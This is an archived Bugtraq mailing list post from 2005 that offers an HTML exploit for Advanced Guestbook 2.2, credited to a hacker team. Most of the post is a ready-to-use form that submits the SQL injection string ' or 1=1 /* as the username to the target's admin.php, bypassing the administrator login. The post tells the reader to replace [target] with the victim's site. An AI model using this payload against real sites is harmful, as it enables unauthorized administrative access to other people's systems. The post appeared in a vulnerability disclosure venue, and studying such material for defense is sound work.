Bugtraq mailing list archives

exploit (html) for Advanced Guestbook 2.2

From: irc0d3r () yahoo com
Date: 16 Dec 2005 18:44:58 -0000

In GOD We Trust;
Kachal667 Under9round Team (KuT)
new exploit with HTML for Advanced Guestbook 2.2 .
This bug found by BHST.
Coded By Hessam-x
Note : For use this exploit first change [target] to victim example : www.targetsite.com/guestbook/admin.php
=====HTML CODE :
<html>
<title>GuestBook 2.2 exploit</title>
<B>Guest Book 2.2 Exploit - coded by Hessam-x - </B>
<B>change "[target]" to Target in source code</B>
<!-- CHANGE [target] to target url / coded by hessam-x @ Kachal667 underground Team --!>
<form method="POST" action="http://[target]/admin.php";>
<input type="hidden" name="username" value=" ' or 1=1 /*">
<input type="hidden" name="password" value="">
<input type="hidden" name="enter" value="1">
<center><input type="submit" value="GO" class="input"></center>
</html>

Current thread:

exploit (html) for Advanced Guestbook 2.2 irc0d3r (Dec 16)